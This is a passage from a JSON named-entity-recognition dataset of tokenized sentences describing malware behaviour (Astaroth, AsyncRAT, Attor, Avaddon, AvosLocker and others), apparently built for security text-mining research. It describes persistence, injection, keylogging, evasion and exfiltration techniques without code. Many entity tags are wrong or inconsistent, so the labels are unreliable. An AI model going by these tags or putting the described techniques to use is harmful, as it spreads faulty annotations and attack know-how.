"Astaroth", "searches", "for", "different", "processes", "on", "the", "system." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "can", "create", "a", "new", "process", "in", "a", "suspended", "state", "from", "a", "targeted", "legitimate", "process", "in", "order", "to", "unmap", "its", "memory", "and", "replace", "it", "with", "malicious", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "creates", "a", "startup", "item", "for", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "can", "be", "loaded", "through", "regsvr32.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Astaroth", "checks", "for", "the", "presence", "of", "Avast", "antivirus", "in", "the", "<code>C:\\Program\\Files\\</code>", "folder." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "uses", "the", "LoadLibraryExW()", "function", "to", "load", "additional", "modules." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth's", "initial", "payload", "is", "a", "malicious", ".LNK", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "Astaroth", "uses", "a", "software", "packer", "called", "Pe123\\RPolyCryptor." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Astaroth", "has", "been", "delivered", "via", "malicious", "e-mail", "attachments." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Astaroth", "encodes", "data", "using", "Base64", "before", "sending", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "can", "check", "for", "Windows", "product", "ID's", "used", "by", "sandboxes", "and", "usernames", "and", "disk", "serial", "numbers", "associated", "with", "analyst", "environments." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "collects", "the", "machine", "name", "and", "keyboard", "language", "from", "the", "system." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "collects", "the", "external", "IP", "address", "from", "the", "system." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "collects", "the", "timestamp", "from", "the", "infected", "machine." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "uses", "an", "external", "software", "known", "as", "NetPass", "to", "recover", "passwords." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "has", "used", "malicious", "VBS", "e-mail", "attachments", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "spawns", "a", "CMD", "process", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "uses", "WMIC", "to", "execute", "payloads." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "executes", "embedded", "JScript", "or", "VBScript", "in", "an", "XSL", "stylesheet", "located", "on", "a", "remote", "domain." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Tool", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AsyncRAT", "can", "use", "the", "`CheckRemoteDebuggerPresent`", "function", "to", "detect", "the", "presence", "of", "a", "debugger." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AsyncRAT", "can", "be", "configured", "to", "use", "dynamic", "DNS." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Tool", "B-Way" ] }, { "tokens": [ "AsyncRAT", "can", "hide", "the", "execution", "of", "scheduled", "tasks", "using", "`ProcessWindowStyle.Hidden`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "AsyncRAT", "has", "the", "ability", "to", "download", "files", "over", "SFTP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "AsyncRAT", "can", "capture", "keystrokes", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "AsyncRAT", "has", "the", "ability", "to", "use", "OS", "APIs", "including", "`CheckRemoteDebuggerPresent`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "AsyncRAT", "can", "examine", "running", "processes", "to", "determine", "if", "a", "debugger", "is", "present." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AsyncRAT", "can", "create", "a", "scheduled", "task", "to", "maintain", "persistence", "on", "system", "start-up." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "AsyncRAT", "has", "the", "ability", "to", "view", "the", "screen", "on", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "AsyncRAT", "can", "identify", "strings", "such", "as", "Virtual,", "vmware,", "or", "VirtualBox", "to", "detect", "virtualized", "environments." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "B-Tool", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "AsyncRAT", "can", "check", "the", "disk", "size", "through", "the", "values", "obtained", "with", "`DeviceInfo.`" ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AsyncRAT", "can", "check", "if", "the", "current", "user", "of", "a", "compromised", "system", "is", "an", "administrator." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AsyncRAT", "can", "record", "screen", "content", "on", "targeted", "systems." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "can", "obtain", "application", "window", "titles", "and", "then", "determines", "which", "windows", "to", "perform", "Screen", "Capture", "on." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "encrypts", "collected", "data", "with", "a", "custom", "implementation", "of", "Blowfish", "and", "RSA", "ciphers." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Attor's", "Blowfish", "key", "is", "encrypted", "with", "a", "public", "RSA", "key." ], "ner_tags": [ "B-SamFile", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "performs", "the", "injection", "by", "attaching", "its", "code", "into", "the", "APC", "queue", "using", "NtQueueApcThread", "API." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Attor's", "has", "a", "plugin", "that", "is", "capable", "of", "recording", "audio", "using", "available", "input", "sound", "devices." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "has", "automatically", "collected", "data", "about", "the", "compromised", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "has", "a", "file", "uploader", "plugin", "that", "automatically", "exfiltrates", "the", "collected", "data", "and", "log", "files", "to", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "has", "a", "plugin", "that", "collects", "data", "stored", "in", "the", "Windows", "clipboard", "by", "using", "the", "OpenClipboard", "and", "GetClipboardData", "APIs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Strings", "in", "Attor's", "components", "are", "encrypted", "with", "a", "XOR", "cipher,", "using", "a", "hardcoded", "key", "and", "the", "configuration", "data,", "log", "files", "and", "plugins", "are", "encrypted", "using", "a", "hybrid", "encryption", "scheme", "of", "Blowfish-OFB", "combined", "with", "RSA." ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "I-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "Attor", "has", "exfiltrated", "data", "over", "the", "C2", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor’s", "plugin", "deletes", "the", "collected", "files", "and", "log", "files", "after", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "has", "used", "FTP", "protocol", "for", "C2", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Attor", "has", "a", "plugin", "that", "enumerates", "files", "with", "specific", "extensions", "on", "all", "hard", "disk", "drives", "and", "stores", "file", "information", "in", "encrypted", "log", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "can", "set", "attributes", "of", "log", "files", "and", "directories", "to", "HIDDEN,", "SYSTEM,", "ARCHIVE,", "or", "a", "combination", "of", "those." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "can", "download", "additional", "plugins,", "updates", "and", "other", "files." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O" ] }, { "tokens": [ "One", "of", "Attor's", "plugins", "can", "collect", "user", "credentials", "via", "capturing", "keystrokes", "and", "can", "capture", "keystrokes", "pressed", "within", "the", "window", "of", "the", "injected", "process." ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "I-Features", "I-Features", "I-Features", "O", "I-Features", "B-HackOrg", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "has", "staged", "collected", "data", "in", "a", "central", "upload", "directory", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor's", "dispatcher", "can", "establish", "persistence", "via", "adding", "a", "Registry", "key", "with", "a", "logon", "script", "<code>HKEY_CURRENT_USER\\Environment", "\"UserInitMprLogonScript\"", "</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "Attor's", "dispatcher", "disguises", "itself", "as", "a", "legitimate", "task", "(i.e.,", "the", "task", "name", "and", "description", "appear", "legitimate)." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor's", "dispatcher", "can", "modify", "the", "Run", "registry", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "has", "used", "Tor", "for", "C2", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Attor's", "dispatcher", "has", "used", "CreateProcessW", "API", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "Attor", "has", "a", "plugin", "that", "collects", "information", "about", "inserted", "storage", "devices,", "modems,", "and", "phone", "devices." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Attor's", "dispatcher", "can", "inject", "itself", "into", "running", "processes", "to", "gain", "higher", "privileges", "and", "to", "evade", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "has", "opened", "the", "registry", "and", "performed", "query", "searches." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor's", "installer", "plugin", "can", "schedule", "rundll32.exe", "to", "load", "the", "dispatcher." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Attor's", "installer", "plugin", "can", "schedule", "a", "new", "task", "that", "loads", "the", "dispatcher", "on", "boot/logon." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor's", "has", "a", "plugin", "that", "captures", "screenshots", "of", "the", "target", "applications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Attor's", "dispatcher", "can", "be", "executed", "as", "a", "service." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor's", "dispatcher", "can", "execute", "additional", "plugins", "by", "loading", "the", "respective", "DLLs." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "has", "encrypted", "data", "symmetrically", "using", "a", "randomly", "generated", "Blowfish", "(OFB)", "key", "which", "is", "encrypted", "with", "a", "public", "RSA", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "can", "detect", "whether", "it", "is", "executed", "in", "some", "virtualized", "or", "emulated", "environment", "by", "searching", "for", "specific", "artifacts,", "such", "as", "communication", "with", "I/O", "ports", "and", "using", "VM-specific", "instructions." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Attor", "monitors", "the", "free", "disk", "space", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor", "has", "manipulated", "the", "time", "of", "last", "access", "to", "files", "and", "registry", "keys", "after", "they", "have", "been", "created", "or", "modified." ], "ner_tags": [ "B-Idus", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attor's", "dispatcher", "can", "establish", "persistence", "by", "registering", "a", "new", "service." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "AuTo", "Stealer", "can", "collect", "data", "such", "as", "PowerPoint", "files,", "Word", "documents,", "Excel", "files,", "PDF", "files,", "text", "files,", "database", "files,", "and", "image", "files", "from", "an", "infected", "machine." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "O", "O", "B-Way", "B-Tool", "I-Tool", "O", "B-Way", "B-Tool", "I-Tool", "O", "I-Tool", "O", "I-Features", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "AuTo", "Stealer", "can", "exfiltrate", "data", "over", "actor-controlled", "C2", "servers", "via", "HTTP", "or", "TCP." ], "ner_tags": [ "B-Way", "B-HackOrg", "O", "B-SamFile", "B-Purp", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "AuTo", "Stealer", "can", "store", "collected", "data", "from", "an", "infected", "host", "to", "a", "file", "named", "`Hostname_UserName.txt`", "prior", "to", "exfiltration." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "AuTo", "Stealer", "can", "use", "TCP", "to", "communicate", "with", "command", "and", "control", "servers." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AuTo", "Stealer", "can", "place", "malicious", "executables", "in", "a", "victim's", "AutoRun", "registry", "key", "or", "StartUp", "directory,", "depending", "on", "the", "AV", "product", "installed,", "to", "maintain", "persistence." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "B-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AuTo", "Stealer", "has", "the", "ability", "to", "collect", "information", "about", "installed", "AV", "products", "from", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AuTo", "Stealer", "has", "the", "ability", "to", "collect", "the", "hostname", "and", "OS", "information", "from", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AuTo", "Stealer", "has", "the", "ability", "to", "collect", "the", "username", "from", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AuTo", "Stealer", "can", "use", "HTTP", "to", "communicate", "with", "its", "C2", "servers." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AuTo", "Stealer", "can", "use", "`cmd.exe`", "to", "execute", "a", "created", "batch", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AuditCred", "uses", "XOR", "and", "RC4", "to", "perform", "decryption", "on", "the", "code", "functions." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AuditCred", "encrypts", "the", "configuration." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "AuditCred", "can", "delete", "files", "from", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "AuditCred", "can", "search", "through", "folders", "and", "files", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AuditCred", "can", "download", "files", "and", "additional", "malware." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "AuditCred", "can", "inject", "code", "from", "files", "to", "other", "running", "processes." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AuditCred", "can", "utilize", "proxy", "for", "communications." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "AuditCred", "can", "open", "a", "reverse", "shell", "on", "the", "system", "to", "execute", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AuditCred", "is", "installed", "as", "a", "new", "service", "on", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AutoIt", "backdoor", "attempts", "to", "escalate", "privileges", "by", "bypassing", "User", "Access", "Control." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "AutoIt", "backdoor", "is", "capable", "of", "identifying", "documents", "on", "the", "victim", "with", "the", "following", "extensions:", ".doc;", ".pdf,", ".csv,", ".ppt,", ".docx,", ".pst,", ".xls,", ".xlsx,", ".pptx,", "and", ".jpeg." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "AutoIt", "backdoor", "downloads", "a", "PowerShell", "script", "that", "decodes", "to", "a", "typical", "shellcode", "loader." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AutoIt", "backdoor", "has", "sent", "a", "C2", "response", "that", "was", "base64-encoded." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avaddon", "bypasses", "UAC", "using", "the", "CMSTPLUA", "COM", "interface." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Avaddon", "encrypts", "the", "victim", "system", "using", "a", "combination", "of", "AES256", "and", "RSA", "encryption", "schemes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Avaddon", "has", "decrypted", "encrypted", "strings." ], "ner_tags": [ "B-Time", "O", "O", "O", "O" ] }, { "tokens": [ "Avaddon", "looks", "for", "and", "attempts", "to", "stop", "anti-malware", "solutions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avaddon", "has", "searched", "for", "specific", "files", "prior", "to", "encryption." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avaddon", "deletes", "backups", "and", "shadow", "copies", "using", "native", "system", "tools." ], "ner_tags": [ "B-Idus", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avaddon", "has", "been", "executed", "through", "a", "malicious", "JScript", "downloader." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Avaddon", "modifies", "several", "registry", "keys", "for", "persistence", "and", "UAC", "bypass." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avaddon", "has", "used", "the", "Windows", "Crypto", "API", "to", "generate", "an", "AES", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avaddon", "has", "enumerated", "shared", "folders", "and", "mapped", "volumes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avaddon", "has", "used", "encrypted", "strings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "Avaddon", "has", "collected", "information", "about", "running", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avaddon", "uses", "registry", "run", "keys", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Avaddon", "looks", "for", "and", "attempts", "to", "stop", "database", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avaddon", "checks", "for", "specific", "keyboard", "layouts", "and", "OS", "languages", "to", "avoid", "targeting", "Commonwealth", "of", "Independent", "States", "(CIS)", "entities." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avaddon", "can", "collect", "the", "external", "IP", "address", "of", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avaddon", "uses", "wmic.exe", "to", "delete", "shadow", "copies." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Avenger", "has", "the", "ability", "to", "decrypt", "files", "downloaded", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Avenger", "has", "the", "ability", "to", "XOR", "encrypt", "files", "to", "be", "sent", "to", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "B-HackOrg", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avenger", "has", "the", "ability", "to", "browse", "files", "in", "directories", "such", "as", "Program", "Files", "and", "the", "Desktop." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-Way" ] }, { "tokens": [ "Avenger", "has", "the", "ability", "to", "download", "files", "from", "C2", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avenger", "has", "the", "ability", "to", "use", "Tasklist", "to", "identify", "running", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Avenger", "has", "the", "ability", "to", "inject", "shellcode", "into", "svchost.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "Avenger", "has", "the", "ability", "to", "identify", "installed", "anti-virus", "products", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avenger", "can", "extract", "backdoor", "malware", "from", "downloaded", "images." ], "ner_tags": [ "B-Idus", "O", "I-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Avenger", "has", "the", "ability", "to", "identify", "the", "host", "volume", "ID", "and", "the", "OS", "architecture", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avenger", "can", "identify", "the", "domain", "of", "the", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Avenger", "has", "the", "ability", "to", "use", "HTTP", "in", "communication", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "AvosLocker", "has", "encrypted", "files", "and", "network", "resources", "using", "AES-256", "and", "added", "an", "`.avos`,", "`.avos2`,", "or", "`.AvosLinux`", "extension", "to", "filenames." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "AvosLocker", "has", "deobfuscated", "XOR-encoded", "strings." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "AvosLocker", "has", "used", "obfuscated", "API", "calls", "that", "are", "retrieved", "by", "their", "checksums." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AvosLocker", "has", "searched", "for", "files", "and", "directories", "on", "a", "compromised", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AvosLocker", "has", "hidden", "its", "console", "window", "by", "using", "the", "`ShowWindow`", "API", "function." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AvosLocker", "has", "been", "disguised", "as", "a", ".jpg", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "AvosLocker", "has", "used", "a", "variety", "of", "Windows", "API", "calls,", "including", 